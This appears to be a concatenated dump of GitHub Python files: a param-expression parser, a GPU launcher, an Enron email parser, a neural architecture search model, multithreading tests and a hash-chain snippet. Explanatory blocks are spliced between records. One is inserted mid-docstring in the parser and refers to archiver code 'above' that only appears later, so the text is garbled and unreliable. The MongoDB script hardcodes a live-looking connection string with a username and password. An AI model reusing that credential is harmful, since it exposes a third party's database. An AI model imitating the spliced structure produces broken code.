eat(self, token_types: typing.Optional[typing.List[str]]) -> Token:\n \"\"\"\n Consumes the next token produced by the lexer. If a list of valid token types is given, this method will throw\n a :class:`.exception.ParserSyntaxException` if the produced token's type is not within the list.\n\n :param token_types: The list of valid token types.\n :raise ParserSyntaxException: The exception raised if the produced token is not within the allowed types.\n :return: The next token produced by the lexer.\n \"\"\"\n token = self._lexer.get_next_token()\n\n if token_types and token.token_type not in token_types:\n self.raise_unexpected_token(token)\n\n return token\n\n def raise_unexpected_token(self, token: Token):\n \"\"\"\n Raises a :class:`.exception.ParserSyntaxException` for the given token.\n\n :param token: The token to raise an exception for.\n :raise ParserSyntaxException: The exception for the given token.\n :return:\n \"\"\"\n raise ParserSyntaxException(\n \"Unexpected token '{}' at position '{}'\".format(\n token.token_type,\n token.token_position + self._offset,\n )\n )\n\n\nclass ParamParser(Parser):\n \"\"\"\n Parses tokens of a param expression. That is an expression that looks as follows:\n `\"name:type:option1,option2,option3\"`\n \"\"\"\n\n def parse(self) -> typing.List[typing.Union[str, list]]:\n \"\"\"\n Parses the tokens generated by the lexer and returns a list containing the param configuration of the\n expression. The first element of the list is the name of the param as a string. The second element is the type\n of the param as a string. The type may be :data:`None`. 
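The Enron-file archiver above is the canonical stream-copy into a gzip file: `shutil.copyfileobj` from the raw CSV into `gzip.open(..., 'wb')`, so large inputs never sit fully in memory. Stripped of the date-stamped naming:

```python
import gzip
import shutil

def gzip_copy(src_path, dst_path):
    with open(src_path, "rb") as f_in, gzip.open(dst_path, "wb") as f_out:
        shutil.copyfileobj(f_in, f_out)   # chunked copy, constant memory
```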
The third param is a list of strings, where each element\n represents the option's value.\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed strings and lists representing the expression.\n \"\"\"\n param_name_token = self.eat([Token.TYPE_SEQUENCE])\n param_name = param_name_token.token_value\n self.eat([Token.TYPE_EOF, Token.TYPE_COLON])\n\n param_type_token = self.eat([Token.TYPE_EOF, Token.TYPE_SEQUENCE])\n param_type = param_type_token.token_value\n self.eat([Token.TYPE_EOF, Token.TYPE_COLON])\n\n param_options_token = self.eat([Token.TYPE_EOF, Token.TYPE_SEQUENCE])\n param_options = param_options_token.token_value\n self.eat([Token.TYPE_EOF])\n\n if param_options_token.token_type == Token.TYPE_SEQUENCE:\n param_options_parser = ParamOptionsParser(\n ParamOptionsLexer(param_options_token.token_raw_value),\n param_options_token.token_position + self._offset,\n )\n param_options = param_options_parser.parse()\n\n return [\n param_name,\n param_type,\n param_options,\n ]\n\n\nclass ParamOptionsParser(Parser):\n \"\"\"\n Parses tokens of a param options expression. That is an expression that looks as follows:\n `\"option1,option2,option3\"`\n \"\"\"\n\n def parse(self) -> typing.List[str]:\n \"\"\"\n Parses the tokens generated by the lexer and returns a list of strings, where each string is an option value.\n The order of the list equals the order of option values within the expression.\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed strings representing the expression.\n \"\"\"\n options_list = []\n current_token = self.eat([Token.TYPE_EOF, Token.TYPE_SEQUENCE])\n\n while current_token.token_type != Token.TYPE_EOF:\n options_list.append(current_token.token_value)\n\n self.eat([Token.TYPE_EOF, Token.TYPE_COMMA])\n current_token = self.eat([Token.TYPE_EOF, Token.TYPE_SEQUENCE])\n\n return options_list\n\n\nclass ParamSequenceParser(Parser):\n \"\"\"\n Parses tokens of a param sequence expression. That is an expression that looks as follows:\n `\"random-sequence{name:type:option1,option2,option3}other-random-sequence\"`\n \"\"\"\n\n def parse(self) -> typing.List[Node]:\n \"\"\"\n Parses the tokens generated by the lexer and returns a list of nodes representing the structure\n of the expression. 
A node may be a :class:`.node.SequenceNode`, which represents a sequence of text without any\n meaning, or may be a :class:`.node.ParamNode`, which represent a parameter with a name, optional type and some\n options.\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed nodes representing the expression.\n \"\"\"\n node_list = []\n current_token = self.eat(\n [Token.TYPE_EOF, Token.TYPE_SEQUENCE, Token.TYPE_LC_BRACKET]\n )\n\n while current_token.token_type != Token.TYPE_EOF:\n current_token_type = current_token.token_type\n\n if current_token_type == Token.TYPE_SEQUENCE:\n node_list.append(SequenceNode(current_token.token_value))\n\n elif current_token_type == Token.TYPE_LC_BRACKET:\n param_sequence_token = self.eat([Token.TYPE_SEQUENCE])\n param_sequence_parser = ParamParser(\n ParamLexer(param_sequence_token.token_raw_value),\n param_sequence_token.token_position + self._offset,\n )\n param_sequence = param_sequence_parser.parse()\n\n node_list.append(\n ParamNode(param_sequence[0], param_sequence[1], param_sequence[2])\n )\n\n self.eat([Token.TYPE_RC_BRACKET])\n\n current_token = self.eat(\n [Token.TYPE_EOF, Token.TYPE_SEQUENCE, Token.TYPE_LC_BRACKET]\n )\n\n return node_list\n\n\ndef parse(expression: str) -> typing.List[Node]:\n \"\"\"\n Parses the given expression and returns a list of :class:`.node.SequenceNode` and :class:`.node.ParamNode`\n instances. The expected expression looks as follows:\n `\"random-sequence{name:type:option1,option2,option3}other-random-sequence\"`\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed nodes representing the expression.\n \"\"\"\n parser = ParamSequenceParser(ParamSequenceLexer(expression), 0)\n return parser.parse()\n","repo_name":"anexia/python-param-parser","sub_path":"param_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17907900945","text":"import torch\nimport sys\nimport subprocess\n\nargslist = list(sys.argv)[1:]\nworld_size = torch.cuda.device_count()\ndevice_ids = None\nif '--device-ids' in argslist: # Manually specified GPU IDs\n device_ids = argslist[argslist.index('--device-ids') + 1].strip().split(',')\n world_size = len(device_ids)\n # Remove GPU IDs since these are not for the training script\n argslist.pop(argslist.index('--device-ids') + 1)\n argslist.pop(argslist.index('--device-ids'))\n\nif '--world-size' in argslist:\n argslist[argslist.index('--world-size') + 1] = str(world_size)\nelse:\n argslist.append('--world-size')\n argslist.append(str(world_size))\n\nworkers = []\n\nfor i in range(world_size):\n if '--rank' in argslist:\n argslist[argslist.index('--rank') + 1] = str(i)\n else:\n argslist.append('--rank')\n argslist.append(str(i))\n if '--gpu-rank' in argslist:\n if device_ids:\n argslist[argslist.index('--gpu-rank') + 1] = str(device_ids[i])\n else:\n argslist[argslist.index('--gpu-rank') + 1] = str(i)\n else:\n argslist.append('--gpu-rank')\n argslist.append(str(i))\n stdout = None if i == 0 else open(\"GPU_\" + str(i) + \".log\", \"w\")\n print(argslist)\n p = subprocess.Popen([str(sys.executable)] + argslist, stdout=stdout, stderr=stdout)\n workers.append(p)\n\nfor p in workers:\n p.wait()\n if p.returncode != 0:\n raise subprocess.CalledProcessError(returncode=p.returncode,\n 
cmd=p.args)\n","repo_name":"msr-fiddle/synergy","sub_path":"simulator/deployment/models/deepspeech.pytorch/multiproc.py","file_name":"multiproc.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"34"} +{"seq_id":"6255819025","text":"from pymongo import MongoClient\n\nmongodb = \"mongodb+srv://Gosha:CSWN23zgHAd81lEh@cluster0.d4qarje.mongodb.net/?retryWrites=true&w=majority\"\nclient = MongoClient(mongodb)\ndatabase = client.get_database(\"default\")\nusers_collection = database.get_collection(\"users\")\n\nall_users = users_collection.find({})\nfor user in all_users:\n print(user)","repo_name":"PavloMelnikovich/Game_bot","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32543233300","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport csv\nimport json\nimport uuid\nimport shutil\nimport gzip\nfrom collections import Counter\nfrom datetime import datetime\n\n# Stats Counters\nsender_counter = Counter()\nreceiver_counter = Counter()\nconnections_counter = Counter() # Counter for the connection extension for Neo4j\nrow_number = 0\n\n\ndef write_json(email_, row_number_, file_input_):\n \"\"\" Write the email dictionary into a json file.\n\n :param email_: dictionary of one row\n :param row_number_: the position of the row in the file\n :param file_input_: The path name of the source file\n\n :return:null\n \"\"\"\n filename = file_input_.split('/')[-1]\n json_file = './processed/{}-{}.json'.format(filename, row_number_)\n\n with open(json_file, 'w') as f:\n json.dump(email_, f, indent=4, separators=(',', ': '))\n # Added for POSIX compatibility\n f.write('\\n')\n f.close()\n\n\ndef archive_file(input_file_):\n \"\"\"The function archive the source file\n\n :param input_file_: The path name of the source file\n :return:null\n \"\"\"\n filename = input_file_.split('/')[-1]\n archive_path = './archive/'\n\n current_data = datetime.now()\n current_data = current_data.strftime(\"%Y%m%d\")\n archived_file = '{}{}-processed-{}.gz'.format(archive_path, filename, current_data)\n\n with open(input_file, 'rb') as f_in, gzip.open(archived_file, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n print(\"File Archived as {}\".format(archived_file))\n\n\ndef statistics_updater(email_):\n \"\"\"The function extract from the email dictionary, the sender and receiver(s)\n and update the related counters.\n :param email_:dictionary of one row\n :return:\n \"\"\"\n global row_number\n row_number += 1\n\n sender_counter[email_['sender']] += 1\n\n for receiver in email_['recipients']:\n receiver_counter[receiver] += 1\n\n\ndef network_updater(email_):\n \"\"\"The function extract from the email dictionary, the sender and receiver(s)\n and update the related counters.\n :param email_:dictionary of one row\n :return:\n \"\"\"\n for receiver in email_['recipients']:\n connection= \"{}-{}\".format(email_['sender'],receiver)\n print(connection)\n connections_counter[connection] += 1\n\ndef statistics_final(input_file_):\n \"\"\" The function consolidate the counters for the received and send emails\n and dump all into the -stat.cvs file.\n :param input_file_: The path name of the source file\n :return:\n \"\"\"\n filename = input_file_.split('/')[-1]\n filename = './{}-stats.csv'.format(filename)\n file_stats = open(filename, 'w')\n file_stats.write('User, Received_Emails, 
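The multiproc launcher above boils down to one pattern: spawn one copy of the training script per GPU with a distinct rank, and send every non-rank-0 worker's output to a log file. A standalone sketch of that pattern (the argument names are illustrative):

import subprocess
import sys

def launch_per_gpu(argslist, world_size):
    workers = []
    for rank in range(world_size):
        args = argslist + ['--rank', str(rank)]
        # Only rank 0 inherits the console; others log to GPU_<rank>.log.
        out = None if rank == 0 else open('GPU_{}.log'.format(rank), 'w')
        workers.append(subprocess.Popen([sys.executable] + args, stdout=out, stderr=out))
    for p in workers:
        p.wait()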
Sent_Emails\\n')\n    list_users = sorted(set(sender_counter.keys()) | set(receiver_counter.keys()))\n    for user in list_users:\n        file_stats.write('\"{}\",{},{}\\n'.format(user, receiver_counter.get(user, 0), sender_counter.get(user, 0)))\n    file_stats.close()\n    print(\"File statistics written as {}\".format(filename))\n\n\ndef check_file():\n    \"\"\"The function tests the application input arguments and the existence of the source file\n\n    :return:\n    \"\"\"\n    # Check the command line argument\n    if len(sys.argv) != 2:\n        print(\"\\n Sorry, not a valid format\")\n        print(\"\\nPlease, use the format, as in the example below:\")\n        print(\"python parse-daily-enron-file.py source/enron-event-history-20180202.csv\")\n        exit()\n    input_file_ = str(sys.argv[1])\n    # check if the file exists\n    if not os.path.isfile(input_file_):\n        print(\"Sorry, file not found\")\n        print(\"File {} does not exist, please check the file path\".format(input_file_))\n        exit()\n    return input_file_\n\n\nif __name__ == \"__main__\":\n\n    input_file = check_file()\n\n    row_number = 0\n    with open(input_file) as csv_file:\n        readCSV = csv.reader(csv_file, delimiter=',')\n        for row in readCSV:\n            row_number += 1\n            email = dict()\n            email['timestamp_iso'] = datetime.utcfromtimestamp(int(row[0])/1000).isoformat()\n            email['unique_id'] = str(uuid.uuid4())\n            email['message identifier'] = row[1]\n            email['sender'] = row[2].lower()\n            email['recipients'] = row[3].lower().split('|')\n\n            dict_recipients = {'name': 'number_of_recipients', 'value': len(row[3].split('|'))}\n            email['attributes'] = [dict_recipients, ]\n\n            # it is always empty but we keep it for consistency\n            email[\"topic\"] = row[4]\n\n            # it is always mail but we keep it for consistency\n            email[\"email\"] = row[5]\n\n            write_json(email, row_number, input_file)\n\n            statistics_updater(email)\n            network_updater(email)\n\n        csv_file.close()\n\n    archive_file(input_file)\n\n    statistics_final(input_file)\n    print(connections_counter)\n","repo_name":"EnzoCalogero/personal_note","sub_path":"etl/parse-daily-enron-file.py","file_name":"parse-daily-enron-file.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
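A self-contained illustration of the tallying done by statistics_updater and statistics_final above; the two sample emails are made up. The user list is built from the union of both counters so that receive-only users appear in the report as well:

from collections import Counter

sender_counter, receiver_counter = Counter(), Counter()
for email in ({'sender': 'a@enron.com', 'recipients': ['b@enron.com', 'c@enron.com']},
              {'sender': 'b@enron.com', 'recipients': ['a@enron.com']}):
    sender_counter[email['sender']] += 1
    for receiver in email['recipients']:
        receiver_counter[receiver] += 1

for user in sorted(set(sender_counter) | set(receiver_counter)):
    print(user, receiver_counter.get(user, 0), sender_counter.get(user, 0))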
+{"seq_id":"73856037217","text":"from TorchSUL import Model as M \nimport torch\nimport torch.nn as nn \nimport torch.nn.functional as F \nfrom torch.nn.parameter import Parameter\nimport torch.nn.init as init \n\nclass Zero(M.Model):\n\tdef initialize(self, stride):\n\t\tself.stride = stride\n\tdef forward(self, x):\n\t\tif self.stride==1:\n\t\t\treturn x * 0\n\t\telse:\n\t\t\tx = x[:,:, ::self.stride, ::self.stride] * 0\n\t\t\treturn x \n\nclass MP33(M.Model):\n\tdef initialize(self, stride, bn=False):\n\t\tself.bn = bn \n\t\tself.p = M.MaxPool2D(3, stride)\n\t\tif self.bn:\n\t\t\tself.batch_norm = M.BatchNorm()\n\tdef forward(self, x):\n\t\t# print(x)\n\t\tx = self.p(x)\n\t\tif self.bn:\n\t\t\tx = self.batch_norm(x)\n\t\treturn x\n\nclass AP33(M.Model):\n\tdef initialize(self, stride, bn=False):\n\t\tself.bn = bn \n\t\tself.p = M.AvgPool2D(3, stride)\n\t\tif self.bn:\n\t\t\tself.batch_norm = M.BatchNorm()\n\tdef forward(self, x):\n\t\tx = self.p(x)\n\t\tif self.bn:\n\t\t\tx = self.batch_norm(x)\n\t\treturn x\n\nclass Skip(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.stride = stride\n\t\tif stride!=1:\n\t\t\tself.rd = FactReduce(out)\n\tdef forward(self, x):\n\t\tif self.stride==1:\n\t\t\treturn x \n\t\telse:\n\t\t\treturn self.rd(x)\n\nclass SPConv33(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.c1 = M.DWConvLayer(3, 1, stride=stride, usebias=False)\n\t\tself.c2 = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\tx = self.c2(x)\n\t\treturn x \n\nclass SPConv55(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.c1 = M.DWConvLayer(5, 1, stride=stride, usebias=False)\n\t\tself.c2 = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\tx = self.c2(x)\n\t\treturn x \n\nclass DilConv33(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.c1 = M.ConvLayer(3, out, stride=stride, dilation_rate=2, batch_norm=True, usebias=False)\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\treturn x \n\nclass DilConv55(M.Model):\n\tdef initialize(self, out, stride):\n\t\tself.c1 = M.ConvLayer(5, out, stride=stride, dilation_rate=2, batch_norm=True, usebias=False)\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\treturn x \n\n# class ASPP(M.Model):\n# \tdef initialize(self, out, dilation):\n# \t\tself.c11 = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n# \t\tself.c33 = M.ConvLayer(3, out, usebias=False, batch_norm=True, dilation_rate=dilation)\n# \t\tself.convp = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n# \t\tself.concat_conv = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n# \t\tself.GP = M.GlobalAvgPool()\n# \tdef forward(self, x):\n# \t\tx11 = self.c11(x)\n# \t\tx33 = self.c33(x)\n# \t\tpool = self.GP(x)\n# \t\tup = tf.ones_like(x) * pool \n# \t\tconcat = tf.concat([x11, x33, up], axis=-1)\n# \t\tout = self.concat_conv(concat)\n# \t\treturn out \n\nclass FuseDown(M.Model):\n\tdef initialize(self, steps, inp, o):\n\t\tself.mods = nn.ModuleList()\n\t\tfor i in range(steps):\n\t\t\tif i==(steps-1):\n\t\t\t\tself.mods.append(M.ConvLayer(3, o, stride=2, batch_norm=True, usebias=False))\n\t\t\telse:\n\t\t\t\tself.mods.append(M.ConvLayer(3, o, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False))\n\tdef forward(self, x):\n\t\tfor m in self.mods:\n\t\t\tx = m(x)\n\t\treturn x \n\nclass FactReduce(M.Model):\n\tdef initialize(self, out):\n\t\tself.c1 = M.ConvLayer(1, out//2, stride=2, usebias=False)\n\t\tself.c2 = M.ConvLayer(1, out//2, stride=2, usebias=False)\n\t\tself.bn = M.BatchNorm()\n\tdef forward(self, x):\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx1 = self.c1(x)\n\t\tx2 = self.c2(x[:,:,1:,1:])\n\t\tx = torch.cat([x1, x2], dim=1)\n\t\tx = self.bn(x)\n\t\treturn x \n\nclass FactIncrease(M.Model):\n\tdef initialize(self, out):\n\t\tself.c1 = M.ConvLayer(1, out, usebias=False, batch_norm=True)\n\tdef forward(self, x):\n\t\tx = F.interpolate(x, size=None, scale_factor=2, mode='bilinear', align_corners=False)\n\t\tx = M.activation(x, M.PARAM_RELU)\n\t\tx = self.c1(x)\n\t\treturn x \n\nclass MixedOp(M.Model):\n\tdef initialize(self, out, stride):\n\t\tops = nn.ModuleList()\n\t\tops.append(Zero(stride))\n\t\tops.append(MP33(stride, True))\n\t\tops.append(AP33(stride, True))\n\t\tops.append(Skip(out, stride))\n\t\tops.append(SPConv33(out, stride))\n\t\tops.append(SPConv55(out, stride))\n\t\tops.append(DilConv33(out, stride))\n\t\tops.append(DilConv55(out, stride))\n\t\tself.ops = ops \n\tdef forward(self, x, weights):\n\t\t# print(x.shape)\n\t\tres = sum(w*op(x) for w,op in zip(weights,self.ops))\n\t\t# print(res.shape)\n\t\treturn res \n\nclass CellBuilder(M.Model):\n\tdef initialize(self, step, multiplier, 
c):\n\t\tself.multiplier = multiplier\n\t\tself.step = step\n\n\t\tself._ops = nn.ModuleList()\n\t\tself.step = step\n\t\tfor i in range(step):\n\t\t\tfor j in range(1+i):\n\t\t\t\tself._ops.append(MixedOp(c, 1))\n\t\tself.conv_last = M.ConvLayer(1, c, activation=M.PARAM_RELU, batch_norm=True, usebias=False)\n\n\tdef forward(self, x, w):\n\t\tstates = [x]\n\t\toffset = 0\n\t\tfor i in range(self.step):\n\t\t\tbuff = []\n\t\t\tfor j in range(1+i):\n\t\t\t\top = self._ops[offset]\n\t\t\t\tbuff.append(op(states[j], w[offset]))\n\t\t\t\toffset += 1\n\t\t\tbuff = sum(buff)\n\t\t\tstates.append(buff)\n\t\tconcat_feat = torch.cat(states[-self.multiplier:], dim=1)\n\t\tout = self.conv_last(concat_feat)\n\t\treturn out \n\nclass Stage(M.Model):\n\tdef initialize(self, num_unit, chn, multiplier, step, reduce_size=None):\n\t\tself.units = nn.ModuleList()\n\t\tfor n in range(num_unit):\n\t\t\tself.units.append(CellBuilder(step, multiplier, chn))\n\t\tself.reduce_size = reduce_size\n\t\tif not reduce_size is None:\n\t\t\tself.reduce = FactReduce(reduce_size)\n\tdef forward(self, x, w):\n\t\tfor u in self.units:\n\t\t\tx = u(x, w)\n\t\tif not self.reduce_size is None:\n\t\t\tx = self.reduce(x)\n\t\treturn x \n\nclass Body(M.Model):\n\tdef initialize(self, unit_list, chn_list, multiplier, step):\n\t\tself.step = step \n\n\t\tself.c1 = M.ConvLayer(5, 64, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False)\n\t\tself.c2 = M.ConvLayer(3, 64, stride=1, activation=M.PARAM_RELU, batch_norm=True, usebias=False)\n\n\t\tself.stage1 = Stage(unit_list[0], chn_list[0], multiplier, step, reduce_size=chn_list[1])\n\t\tself.stage2 = Stage(unit_list[1], chn_list[1], multiplier, step, reduce_size=chn_list[2])\n\t\tself.stage3 = Stage(unit_list[2], chn_list[2], multiplier, step, reduce_size=chn_list[3])\n\t\tself.stage4 = Stage(unit_list[3], chn_list[3], multiplier, step, reduce_size=None)\n\n\tdef build(self, *inputs):\n\t\tk = sum(1 for i in range(self.step) for n in range(1+i))\n\t\tself.alphas_cell = Parameter(torch.Tensor(k, 8))\n\t\tinit.zeros_(self.alphas_cell)\n\n\tdef forward(self, x):\n\t\t# hardcode: there are 4 different scales \n\t\tx = self.c1(x)\n\t\tx = self.c2(x)\n\n\t\tw_cell = F.softmax(self.alphas_cell, dim=-1)\n\n\t\tx = self.stage1(x, w_cell)\n\t\tx = self.stage2(x, w_cell)\n\t\tx = self.stage3(x, w_cell)\n\t\tx = self.stage4(x, w_cell)\n\n\t\treturn x \n\nclass AutoFaceNet(M.Model):\n\tdef initialize(self):\n\t\tself.body = Body([2,2,10,2], [64,128,256,512], 3, 3)\n\t\tself.fc1 = M.Dense(512, usebias=False)\n\tdef forward(self, x):\n\t\tx = self.body(x)\n\t\tx = M.flatten(x)\n\t\tfeat = self.fc1(x)\n\t\treturn feat \n\nif __name__=='__main__':\n\timport numpy as np \n\tx = torch.from_numpy(np.float32(np.zeros([1, 3, 112, 112])))\n\t# t = M.ConvLayer(3, 5, dilation_rate=5)\n\t# y = t(x)\n\t# print(y.shape)\n\tbody = Body([2,2,10,2], [64,128,256,512], 3, 3)\n\n\ty = body(x)\n\tprint(y.shape)\n","repo_name":"ddddwee1/sul","sub_path":"SUL_torch/example/network_search/autonetv3.py","file_name":"autonetv3.py","file_ext":"py","file_size_in_byte":7176,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"38954407145","text":"from time import sleep, time\n\nfrom testfixtures.fixture_resources import ResourceCleanup\nfrom utils.multi_thread import MThread, Events, TiSBarrier, TiSLock\nfrom utils.tis_log import LOG\nfrom keywords import nova_helper, vm_helper\n\n\ndef func(func_num, num, extra_arg=None):\n i = 0\n while i < num:\n 
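MixedOp above is the DARTS-style continuous relaxation: every candidate op runs on the same input and the outputs are blended by softmaxed architecture weights. A plain-PyTorch sketch of that idea, with the TorchSUL wrappers swapped for torch.nn equivalents (the three candidate ops here are illustrative, not the full set used above):

import torch
import torch.nn as nn
import torch.nn.functional as F

class TinyMixedOp(nn.Module):
    def __init__(self, channels):
        super().__init__()
        self.ops = nn.ModuleList([
            nn.Identity(),                                            # skip
            nn.Conv2d(channels, channels, 3, padding=1, bias=False),  # conv 3x3
            nn.AvgPool2d(3, stride=1, padding=1),                     # avg pool 3x3
        ])
        # One architecture weight per candidate op, softmaxed at forward time.
        self.alphas = nn.Parameter(torch.zeros(len(self.ops)))

    def forward(self, x):
        w = F.softmax(self.alphas, dim=-1)
        return sum(wi * op(x) for wi, op in zip(w, self.ops))

out = TinyMixedOp(8)(torch.randn(1, 8, 16, 16))
print(out.shape)  # torch.Size([1, 8, 16, 16]) -- every candidate preserves shape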
LOG.info(\"func_num = {}\\niteration = {}\\nextra_arg = {}\".format(func_num, i, extra_arg))\n sleep(1)\n i += 1\n\n LOG.info(\"{} done\".format(func_num))\n\n\ndef test_multi_thread():\n LOG.tc_step(\"Create MThreads\")\n thread_1 = MThread(func, 1, 10, extra_arg=\"Hello\")\n thread_2 = MThread(func, 2, 6, extra_arg=\"Second\")\n # runs after test steps complete\n thread_3 = MThread(func, 3, 20, extra_arg=\"run for a long time\")\n thread_4 = MThread(nova_helper.create_flavor, 'threading', 'auto', vcpus=2, ram=1024)\n\n LOG.tc_step(\"Starting threads\")\n thread_1.start_thread()\n thread_2.start_thread()\n thread_3.start_thread()\n thread_4.start_thread()\n LOG.tc_step(\"Finished starting threads\")\n\n LOG.tc_step(\"Waiting for threads to finish\")\n thread_1.wait_for_thread_end()\n thread_2.wait_for_thread_end()\n thread_4.wait_for_thread_end()\n LOG.tc_step(\"Threads have finished\")\n\n id_ = thread_4.get_output()[1]\n LOG.info(\"flav_id = {}\".format(id_))\n ResourceCleanup.add(resource_type='flavor', resource_id=id_)\n\n\ndef test_copies_of_threads():\n LOG.tc_step(\"Make multiple threads with same params\")\n threads = []\n for i in range(1, 5):\n threads.append(MThread(func, i, 10, extra_arg=\"number: {}\".format(i)))\n\n for thread in threads:\n thread.start_thread()\n\n for thread in threads:\n thread.wait_for_thread_end()\n\n\ndef test_timing():\n threads = []\n flav_id = nova_helper.create_flavor('thread_testing')[1]\n ResourceCleanup.add(resource_type='flavor', resource_id=flav_id)\n start_1 = time()\n for i in range(0, 6):\n thread = MThread(vm_helper.boot_vm, 'threading_vm', flavor=flav_id)\n thread.start_thread(240)\n threads.append(thread)\n\n for thread in threads:\n thread.wait_for_thread_end()\n for thread in threads:\n ResourceCleanup.add(resource_type='vm', resource_id=thread.get_output()[1])\n end_1 = time()\n\n start_2 = time()\n for i in range(0, 2):\n vm_id = vm_helper.boot_vm('loop_vm', flav_id)[1]\n ResourceCleanup.add(resource_type='vm', resource_id=vm_id)\n end_2 = time()\n\n LOG.info(\"Time results:\\n\"\n \"Multithreading: {}\\n\"\n \"Single loop: {}\".format(end_1 - start_1, end_2 - start_2))\n\n\ndef events_func(func_num, reps, event):\n for i in range(0, reps):\n if i > reps / 2:\n event.wait_for_event(30)\n LOG.info(\"Function #{}\".format(func_num))\n sleep(1)\n\n\ndef test_events():\n e = Events(\"functions should wait here\")\n LOG.tc_step(\"Create multiple threads\")\n thread_1 = MThread(events_func, 1, 10, e)\n thread_2 = MThread(events_func, 2, 15, e)\n\n thread_1.start_thread(60)\n thread_2.start_thread(60)\n sleep(20)\n\n LOG.tc_step(\"Setting event\")\n e.set()\n thread_1.wait_for_thread_end()\n thread_2.wait_for_thread_end()\n LOG.tc_step(\"Threads have finished\")\n\n e.clear()\n e.wait_for_event(20, fail_ok=True)\n\n\ndef barr_func(func_num, rep, barrier):\n barrier.wait(10)\n for i in range(0, rep):\n LOG.info(\"function #{}\".format(func_num))\n sleep(1)\n\n\ndef test_barriers():\n LOG.tc_step(\"Negative barrier example (not enough threads waiting)\")\n barrier = TiSBarrier(2, timeout=20)\n thread_1 = MThread(barr_func, 1, 4, barrier)\n thread_1.start_thread(timeout=30)\n thread_1.wait_for_thread_end(fail_ok=True)\n\n LOG.tc_step(\"Positive barrier example\")\n barrier = TiSBarrier(2, timeout=20)\n thread_1 = MThread(barr_func, 2, 4, barrier)\n thread_2 = MThread(barr_func, 3, 4, barrier)\n\n thread_1.start_thread(timeout=30)\n thread_2.start_thread(timeout=30)\n thread_1.wait_for_thread_end()\n thread_2.wait_for_thread_end()\n\n\ndef 
get_lock(lock, th_num):\n sleep(1)\n LOG.info(\"{} getting lock\".format(th_num))\n if lock.acquire():\n LOG.info(\"{} got lock\".format(th_num))\n sleep(5)\n LOG.info(\"{} release lock\".format(th_num))\n else:\n LOG.info(\"Didn't get lock\")\n lock.release()\n LOG.info(\"{} released lock\".format(th_num))\n\n\ndef get_lock_with(lock, th_num):\n sleep(1)\n LOG.info(\"{} getting lock\".format(th_num))\n with lock as got_lock:\n if got_lock:\n LOG.info(\"{} got lock\".format(th_num))\n sleep(5)\n LOG.info(\"{} release lock\".format(th_num))\n else:\n LOG.info(\"Didn't get lock\")\n LOG.info(\"{} released lock\".format(th_num))\n\n\ndef test_lock():\n LOG.tc_step(\"Positive lock example\")\n lock = TiSLock(True)\n thread_1 = MThread(get_lock, lock, 1)\n thread_2 = MThread(get_lock, lock, 2)\n thread_1.start_thread(30)\n sleep(1)\n thread_2.start_thread(30)\n thread_1.wait_for_thread_end(0)\n thread_2.wait_for_thread_end(30)\n\n LOG.tc_step(\"Negative lock example\")\n lock = TiSLock(True, 2)\n thread_1 = MThread(get_lock, lock, 1)\n thread_2 = MThread(get_lock, lock, 2)\n thread_1.start_thread(30)\n sleep(1)\n thread_2.start_thread(30)\n thread_1.wait_for_thread_end(0, fail_ok=True)\n thread_2.wait_for_thread_end(30, fail_ok=True)\n","repo_name":"pvaduva/auto_test","sub_path":"CGCSAuto/testcases/~samples/demo_test_multi_thread.py","file_name":"demo_test_multi_thread.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11378681963","text":"from cryptography.hazmat.primitives import hashes\nimport uuid\nimport logging\nimport os\nfrom environs import Env\n\nenv = Env()\n# Read .env into os.environ\nenv.read_env()\n\nLOG_FILE = env(\"log_file\")\n\nlogging.basicConfig(\n filename=LOG_FILE,\n filemode=\"a+\",\n format=\"%(name)s - %(levelname)s - %(message)s\",\n level=logging.DEBUG,\n)\n\n\nclass data_block:\n def __init__(self, data_trxn: str):\n self.trxn = data_trxn\n\n def __str__(self):\n return str(self.__dict__)\n\n\nclass genesys_block:\n def __init__(self):\n self.data = data_block(data_trxn=\"GAN0\")\n\n\nclass meta_block:\n def __init__(self, data: data_block, prev_data: data_block):\n self.uuid = uuid.uuid1()\n self.hash = self._get_hash(data.__str__())\n self.link = self._get_hash(prev_data.__str__())\n\n def _get_hash(self, data: str):\n digest = hashes.Hash(hashes.SHA256())\n digest.update(data.encode(\"utf-8\"))\n return 